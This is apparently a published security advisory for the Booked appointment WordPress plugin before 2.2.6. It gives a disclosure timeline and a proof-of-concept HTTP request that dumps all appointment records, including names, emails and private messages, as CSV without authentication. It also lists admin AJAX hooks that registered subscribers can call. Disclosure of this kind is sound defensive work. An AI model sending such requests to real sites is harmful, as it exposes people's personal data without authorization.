Booked < 2.2.6 – Broken Authentication to Export Users Data in CSV

Description

The plugin allows users to Book Appointment by providing their PII such as Email, Name, Phone Number and Personal Message. The vulnerability allows anyone to Dump all records of users and their appointment details in CSV as an unauthenticated user.

The user also gets registered as a WP User after submitting appointment which introduces more vulnerabilities i.e. a subscriber can approve, delete or modify any appointment and inject Stored XSS.

Edit (WPScanTeam):
February 7th, 2020 - Report Received & Envato Contacted
February 7th, 2020 - Envato Investigating
February 29th, 2020 - v2.2.6 released, fixing the issues

Proof of Concept

Following Request Headers as an unauthenticated user will Dump all User Appointment Details in CSV

======================
Request Header (Start)
======================
POST /wp-admin/admin-post.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Connection: close

booked_export_appointments_csv=
====================
Request Header (End)
====================

The response from above request will look like following PII

"First Name","Last Name",Email,Calendar,Date,"Start Time","End Time","Combined Date/Time","Custom Field Data"
noman,riffat,example@example.com,"Custom Calendar","February 7, 2020","8:00 am","9:00 am","February 9, 2020 from 8:00 am to 9:00 am","hello this is a private message"

After the appointment submission user gets registered as subscriber so he can perform following actions which are intended for Administrator only

add_action('wp_ajax_booked_admin_add_appt', array(&$this,'booked_admin_add_appt'));
add_action('wp_ajax_booked_admin_edit_appt', array(&$this,'booked_admin_edit_appt'));
add_action('wp_ajax_booked_admin_delete_custom_timeslot', array(&$this,'booked_admin_delete_custom_timeslot'));
add_action('wp_ajax_booked_admin_adjust_custom_timeslot_count', array(&$this,'booked_admin_adjust_custom_timeslot_count'));
add_action('wp_ajax_booked_admin_add_custom_timeslot', array(&$this,'booked_admin_add_custom_timeslot'));
add_action('wp_ajax_booked_admin_add_custom_timeslots', array(&$this,'booked_admin_add_custom_timeslots'));
add_action('wp_ajax_booked_admin_save_custom_time_slots', array(&$this,'booked_admin_save_custom_time_slots'));
add_action('wp_ajax_booked_admin_save_custom_fields', array(&$this,'booked_admin_save_custom_fields'));
add_action('wp_ajax_booked_admin_add_timeslots', array(&$this,'booked_admin_add_timeslots'));
add_action('wp_ajax_booked_admin_add_timeslot', array(&$this,'booked_admin_add_timeslot'));
add_action('wp_ajax_booked_admin_clear_timeslots', array(&$this,'booked_admin_clear_timeslots'));
add_action('wp_ajax_booked_admin_adjust_default_timeslot_count', array(&$this,'booked_admin_adjust_default_timeslot_count'));
add_action('wp_ajax_booked_admin_delete_timeslot', array(&$this,'booked_admin_delete_timeslot'));
add_action('wp_ajax_booked_admin_delete_appt', array(&$this,'booked_admin_delete_appt'));
add_action('wp_ajax_booked_admin_approve_appt', array(&$this,'booked_admin_approve_appt'));
add_action('wp_ajax_booked_admin_approve_all', array(&$this,'booked_admin_approve_all'));
add_action('wp_ajax_booked_admin_delete_all', array(&$this,'booked_admin_delete_all'));
add_action('wp_ajax_booked_admin_delete_past', array(&$this,'booked_admin_delete_past'));
add_action('wp_ajax_booked_date_formatting', array(&$this,'booked_date_formatting'));
add_action('wp_ajax_booked_admin_disable_slot', array(&$this,'booked_admin_disable_slot'));

add_action('wp_ajax_booked_admin_load_timeslots', array(&$this,'booked_admin_load_timeslots'));
add_action('wp_ajax_booked_admin_load_full_timeslots', array(&$this,'booked_admin_load_full_timeslots'));
add_action('wp_ajax_booked_admin_load_full_customfields', array(&$this,'booked_admin_load_full_customfields'));
add_action('wp_ajax_booked_admin_calendar_picker', array(&$this,'booked_admin_calendar_picker'));
add_action('wp_ajax_booked_admin_calendar_month', array(&$this,'booked_admin_calendar_month'));
add_action('wp_ajax_booked_admin_calendar_date', array(&$this,'booked_admin_calendar_date'));
add_action('wp_ajax_booked_admin_refresh_date_square', array(&$this,'booked_admin_refresh_date_square'));
add_action('wp_ajax_booked_admin_user_info_modal', array(&$this,'booked_admin_user_info_modal'));
add_action('wp_ajax_booked_admin_new_appointment_form', array(&$this,'booked_admin_new_appointment_form'));
add_action('wp_ajax_booked_admin_custom_timeslots_list', array(&$this,'booked_admin_custom_timeslots_list'));
add_action('wp_ajax_booked_admin_get_timeslots_select', array(&$this,'booked_admin_get_timeslots_select'));